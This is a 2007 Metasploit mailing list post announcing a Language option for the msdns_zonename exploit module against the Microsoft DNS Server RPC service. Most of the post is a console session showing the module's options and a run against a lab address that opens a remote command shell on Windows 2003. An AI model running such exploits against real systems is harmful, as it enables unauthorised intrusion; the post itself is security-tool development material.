Metasploit mailing list archives
msdns_zonename (rev 4711)
From: fab at revhosts.net (Fabrice MOURRON)
Date: Fri, 20 Apr 2007 00:46:14 +0200
With the last release of this module, I had some pain finding an easy way to implement the French targets with the automatic mode. So, I added a new OptString to select the country language and I added some conditions. It's not very sexy, but it's an easier way to implement the next targets for other languages ;-)

msf exploit(msdns_zonename) > show options

Module options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   Language  English          no        Language for automatic target: English, French
   RHOST     192.168.0.200    yes       The target address
   RPORT     0                yes       The target port

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)

msf exploit(msdns_zonename) > set Language French
Language => French
msf exploit(msdns_zonename) > rexploit
[*] Started bind handler
[*] Connecting to the endpoint mapper service...
[*] Discovered Microsoft DNS Server RPC service on port 2189
[*] Connecting to the endpoint mapper service...
[*] Detected a Windows 2003 SP1-SP2 target...
[*] Trying target Windows 2003 Server SP1-SP2 French...
[*] Binding to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ...
[*] Bound to 50abc2a4-574d-40b3-9d66-ee4fd5fba076:5.0 at ncacn_ip_tcp: 192.168.0.200[0] ...
[*] Sending exploit...
[*] Sending stage (474 bytes)
[*] Error: no response from dcerpc service
[*] Command shell session 4 opened (192.168.0.2:50275 -> 192.168.0.200:4444)

Microsoft Windows [version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

@+
Fab

-------------- next part --------------
A non-text attachment was scrubbed...
Name: msdns_zonename.rb
Type: text/x-ruby-script
Size: 7813 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070420/9387ee29/attachment.bin>